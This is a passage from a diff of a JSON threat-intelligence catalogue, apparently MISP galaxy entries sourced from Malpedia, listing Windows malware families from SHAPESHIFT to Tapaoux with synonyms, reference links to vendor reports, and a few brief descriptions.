"https://malpedia.caad.fkie.fraunhofer.de/details/win.shapeshift", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + ] + }, + "uuid": "15dd8386-f11a-485a-b719-440c0a47dee6", + "value": "SHAPESHIFT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "remotecmd" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip", + "https://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" + ] + }, + "uuid": "6f9ed0b0-63c8-4f51-8425-17cfc2b3c12e", + "value": "shareip", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Bitrep" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpknot", + "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf", + "https://eromang.zataz.com/tag/agentbase-exe/" + ] + }, + "uuid": "d31f1c73-d14b-41e2-bb16-81ee1d886e43", + "value": "SHARPKNOT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shelllocker", + "https://twitter.com/JaromirHorejsi/status/813726714228604928" + ] + }, + "uuid": "af35e295-7087-4f6c-9f70-a431bf223822", + "value": "ShellLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/" + ] + }, + "uuid": "6e668c0c-7085-4951-87d4-0334b6a5cdb3", + "value": "Shifu", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat", + "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" + ] + }, + "uuid": "67fc358f-da6a-4f01-be23-44bc97319127", + "value": "Shim RAT", + "description": "" + }, + { + "meta": { + 
"synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin", + "https://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/", + "http://www.nyxbone.com/malware/chineseRansom.html" + ] + }, + "uuid": "77c20bd9-5403-4f99-bae5-c54f3f38a6b6", + "value": "Shujin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shurl0ckr", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications" + ] + }, + "uuid": "f544ee0e-26f4-48e7-aaee-056f4d1ced82", + "value": "Shurl0ckr", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Caphaw" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock", + "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/", + "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/", + "https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware", + "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw", + "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html", + "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/" + ] + }, + "uuid": "515ee69a-298a-4fcf-bdb0-c5fc6d41872f", + "value": "Shylock", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder", + "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c", + "https://s.tencent.com/research/report/479.html" + ] + }, + "uuid": "3c43bd4c-8c40-47b5-ae97-3dd0f0c0e8d8", + "value": "win.sidewinder", + 
"description": "" + }, + { + "meta": { + "synonyms": [ + "Destover" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", + "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/" + ] + }, + "uuid": "da92c927-9b31-48aa-854a-8ed49a29565b", + "value": "Sierra(Alfa,Bravo, ...)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.siggen6" + ] + }, + "uuid": "c12b3e30-32bf-4b7e-98f6-6a00e95553f8", + "value": "Siggen6", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence", + "https://securelist.com/the-silence/83009/", + "http://www.intezer.com/silenceofthemoles/", + "https://www.group-ib.com/resources/threat-research/silence.html" + ] + }, + "uuid": "0df52c23-690b-4703-83f7-5befc38ab376", + "value": "Silence", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.silon", + "http://contagiodump.blogspot.com/2009/11/new-banking-trojan-w32silon-msjet51dll.html", + "http://www.internetnews.com/security/article.php/3846186/TwoHeaded+Trojan+Targets+Online+Banks.htm" + ] + }, + "uuid": "b602edb3-81c2-4772-b5f8-73deb85cb40a", + "value": "Silon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.siluhdur" + ] + }, + "uuid": "774fcb67-1eeb-4bda-9b36-b624b632417a", + "value": "Siluhdur", + "description": "" + }, + { + "meta": { + "synonyms": [ + "iBank" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda", + "https://secrary.com/ReversingMalware/iBank/" + ] + }, + "uuid": 
"467ee29c-317f-481a-a77c-69961eb88c4d", + "value": "Simda", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Theola", + "Quarian", + "Mebroot", + "Anserin", + "Torpig" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal", + "https://en.wikipedia.org/wiki/Torpig", + "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", + "https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/", + "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan" + ] + }, + "uuid": "ad5bcaef-1a86-4cc7-8f2e-32306b995018", + "value": "Sinowal", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/", + "https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4" + ] + }, + "uuid": "0fba78fc-47a1-45e1-b5df-71bcabd23b5d", + "value": "Sisfader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.skarab_ransom", + "http://malware-traffic-analysis.net/2017/11/23/index.html" + ] + }, + "uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694", + "value": "Skarab Ransom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex" + ] + }, + "uuid": "39002a0d-99aa-4568-b110-48f6df1759cd", + "value": "Skyplex", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.slave", + "https://www.cert.pl/en/news/single/slave-banatrix-and-ransomware/" + ] + }, + "uuid": "1f4d8d42-8f31-47f8-b2b7-2d43196de532", + "value": "Slave", + "description": "" + }, + { + "meta": { + 
"synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot", + "https://securelist.com/apt-slingshot/84312/", + "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf", + "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/" + ] + }, + "uuid": "d6178858-1244-41cf-aeed-8c6afc1d6846", + "value": "Slingshot", + "description": "- 2012 first sighted\r\n- Attack vector via compromised Microtik routers where victim's got infection when they connect to Microtik router admin software - Winbox\r\n- 2018 when discovered by Kaspersky Team\r\n\r\nInfection Vector\r\n- Infected Microtik Router > Malicious DLL (IP4.dll) in Router > User connect via windbox > Malicious DLL downloaded on computer" + }, + { + "meta": { + "synonyms": [ + "speccom" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.smac", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf" + ] + }, + "uuid": "a8561caf-eb9f-4a02-8277-a898a0a259ae", + "value": "smac", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Dofoil" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader", + "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/", + "https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo", + "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", + "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", + "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis", + 
"https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign", + "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/", + "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/", + "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait", + "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", + "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/", + "https://www.cert.pl/en/news/single/dissecting-smoke-loader/" + ] + }, + "uuid": "ba91d713-c36e-4d98-9fb7-e16496a69eec", + "value": "SmokeLoader", + "description": "The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body." 
+ }, + { + "meta": { + "synonyms": [ + "Ismo" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru", + "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", + "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" + ] + }, + "uuid": "26b91007-a8ae-4e32-bd99-292e44735c3d", + "value": "Smominru", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader", + "https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/", + "https://twitter.com/VK_Intel/status/898549340121288704", + "https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/", + "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/" + ] + }, + "uuid": "467c726e-6e19-4d15-88b6-362cbe0b3d20", + "value": "SnatchLoader", + "description": "A downloader trojan with some infostealer capabilities focused on the browser. Previously observed as part of RigEK campaigns." 
+ }, + { + "meta": { + "synonyms": [ + "ByeByeShell" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sneepy", + "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" + ] + }, + "uuid": "212d1ed7-0519-412b-a1ce-56046ca93372", + "value": "SNEEPY", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Ursnif" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula", + "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf" + ] + }, + "uuid": "4f3ad937-bf2f-40cb-9695-a2bedfd41bfa", + "value": "Snifula", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan", + "https://medium.com/@jacob16682/snojan-analysis-bb3982fb1bb9" + ] + }, + "uuid": "0646a6eb-1c13-4d87-878e-9431314597bf", + "value": "Snojan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.snslocker" + ] + }, + "uuid": "99a10948-d7ba-4ad0-b73c-c7762143a193", + "value": "SNS Locker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sobaken", + "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" + ] + }, + "uuid": "81e4fc8f-7b05-42bf-8ff9-568362d4f964", + "value": "Sobaken", + "description": "According to ESET, this RAT was derived from (the open-source) Quasar RAT." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz" + ] + }, + "uuid": "38734f44-ebc4-4250-a20e-5dac0fb5c0ed", + "value": "Socks5 Systemz", + "description": "" + }, + { + "meta": { + "synonyms": [ + "BIRDDOG", + "Nadrac" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.accenture.com/t00010101T000000Z__w__/gb-en/_acnmedia/PDF-83/Accenture-Goldfin-Security-Alert.pdf", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ] + }, + "uuid": "da34bf80-6dc6-4b07-8094-8bed2c1176ec", + "value": "SocksBot", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Napolar" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot", + "https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/", + "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/" + ] + }, + "uuid": "d61a1656-9413-46de-bd19-c7fe5eda3371", + "value": "Solarbot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya", + "https://www.codeandsec.com/Soraya-Malware-Analysis-Dropper", + "https://www.arbornetworks.com/blog/asert/the-best-of-both-worlds-soraya/" + ] + }, + "uuid": "26aa3c43-5049-4a2e-bec1-9709b31a1a26", + "value": "soraya", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorgu", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" + ] + }, + "uuid": "bc135ba5-637b-46c9-94fc-2eef5e018bb5", + "value": "Sorgu", + "description": "" + }, + { + 
"meta": { + "synonyms": [ + "denis" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite", + "https://attack.mitre.org/wiki/Software/S0157", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + ] + }, + "uuid": "f4cac204-3d3f-4bb6-84bd-fc27b2f5158c", + "value": "SOUNDBITE", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spedear", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" + ] + }, + "uuid": "bd29030e-d440-4842-bc2a-c173ed938da4", + "value": "Spedear", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom", + "http://malware-traffic-analysis.net/2017/01/17/index2.html", + "https://github.com/MinervaLabsResearch/SporaVaccination", + "https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas", + "https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/", + "https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/", + "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware" + ] + }, + "uuid": "7eeafa7c-0282-4667-bb1a-5ebc3a845d6d", + "value": "Spora", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot" + ] + }, + "uuid": "34e9d701-22a1-4315-891d-443edd077abf", + "value": "SpyBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spynet_rat" + ] + }, + "uuid": "", + "value": "", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirtdanger", + 
"https://researchcenter.paloaltonetworks.com/2018/04/unit42-squirtdanger-swiss-army-knife-malware-veteran-malware-author-thebottle/" + ] + }, + "uuid": "858a2cdb-9c89-436a-b8d4-60c725c7ac63", + "value": "SquirtDanger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", + "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" + ] + }, + "uuid": "009db412-762d-4256-8df9-eb213be01ffd", + "value": "SslMM", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stabuniq", + "http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html", + "https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers" + ] + }, + "uuid": "faa2196f-df4c-454c-995e-ded7864d5fa8", + "value": "Stabuniq", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stampedo", + "https://www.bleepingcomputer.com/news/security/stampado-ransomware-campaign-decrypted-before-it-started/" + ] + }, + "uuid": "b1efbadf-26e5-4e35-8fd2-61642c30ecbf", + "value": "Stampedo", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.starcruft", + "https://securelist.com/operation-daybreak/75100/" + ] + }, + "uuid": "acd8fc63-c22a-4c11-907e-33e358fdd293", + "value": "StarCruft", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.starloader", + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" + ] + }, + "uuid": 
"f1decba9-6b3b-4636-a2b6-2208e178591a", + "value": "StarLoader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.starsypound", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a", + "value": "StarsyPound", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader", + "https://www.secureworks.com/research/stegoloader-a-stealthy-information-stealer" + ] + }, + "uuid": "aea21616-061d-4177-9512-8887853394ed", + "value": "StegoLoader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger" + ] + }, + "uuid": "82ab5235-a71e-4692-a08c-8db337d8b53a", + "value": "Stinger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stration" + ] + }, + "uuid": "0439c5ec-306e-4473-84f7-50bdb5539fc2", + "value": "Stration", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint", + "https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/", + "https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/", + "https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/", + "https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/" + ] + }, + "uuid": "00dedcea-4f87-4b6d-b12d-7749281b1366", + "value": "Stresspaint", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ 
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity", + "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/", + "https://twitter.com/physicaldrive0/status/786293008278970368", + "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/", + "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/" + ] + }, + "uuid": "da2969f2-01e9-4ca8-b2f3-5fc9a9891d57", + "value": "StrongPity", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet", + "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html" + ] + }, + "uuid": "6ad84f52-0025-4a9d-861a-65c870f47988", + "value": "Stuxnet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/", + "http://pwc.blogs.com/cyber_security_updates/2016/03/index.html" + ] + }, + "uuid": "a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4", + "value": "SunOrcal", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox" + ] + }, + "uuid": "dd9939a4-df45-4c7c-8a8d-83b40766aacd", + "value": "SuppoBox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.swift", + "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" + ] + }, + "uuid": "8420653b-1412-45a1-9a2d-6aa9b9eaf906", + "value": "Swift?", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sword", + 
"https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "2112870f-06f1-44a9-9c43-6cc4fb90e295", + "value": "Sword", + "description": "" + }, + { + "meta": { + "synonyms": [ + "getkys" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot", + "https://www.symantec.com/connect/blogs/sykipot-attacks", + "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/", + "https://www.alienvault.com/blogs/labs-research/sykipot-is-back", + "https://community.rsa.com/thread/185437" + ] + }, + "uuid": "99ffeb75-8d21-43a2-b5f7-f58bcbac2228", + "value": "sykipot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.synack", + "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" + ] + }, + "uuid": "a396a0bb-6dc5-424a-bdbd-f8ba808ca2c2", + "value": "SynAck", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.synccrypt", + "https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/" + ] + }, + "uuid": "e717a26d-17aa-4cd7-88de-dc75aa365232", + "value": "SyncCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.synflooder", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "d327b4d9-e1c8-4c71-b9fe-775d1607e7d4", + "value": "SynFlooder", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.synth_loader" + ] + }, + "uuid": "ffd74637-b518-4622-939b-c0669a81f3a9", + "value": 
"Synth Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", + "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" + ] + }, + "uuid": "2ae57534-6aac-4025-8d93-888dab112b45", + "value": "Sys10", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon", + "http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/" + ] + }, + "uuid": "4f079a71-bb1b-47b6-a6d0-26a37cd8a3a6", + "value": "Syscon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" + ] + }, + "uuid": "a4b9c526-42d0-4de9-ab8e-e78f99655d11", + "value": "SysGet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysscan" + ] + }, + "uuid": "7007b268-f6f4-4a01-9184-fc2334461c38", + "value": "SysScan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.szribi", + "https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html", + "https://www.secureworks.com/research/srizbi", + "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel" + ] + }, + "uuid": "66b1094f-7779-43ad-a32b-a9414babcc76", + "value": "Szribi", + "description": "" 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tabmsgsql", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "48aa9c41-f420-418b-975c-1fb6e2a91145", + "value": "TabMsgSQL", + "description": "" + }, + { + "meta": { + "synonyms": [ + "simbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor", + "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", + "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf", + "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html" + ] + }, + "uuid": "94323b32-9566-450b-8480-5f9f53b57948", + "value": "taidoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret", + "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", + "http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html" + ] + }, + "uuid": "b0467c03-824f-4071-8668-f056110d2a50", + "value": "Taleret", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy" + ] + }, + "uuid": "88ff523e-206b-4918-8c93-e2829427eef2", + "value": "Tandfuy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux", + "https://securelist.com/files/2014/11/darkhotel_kl_07.11.pdf" + ] + }, + "uuid": 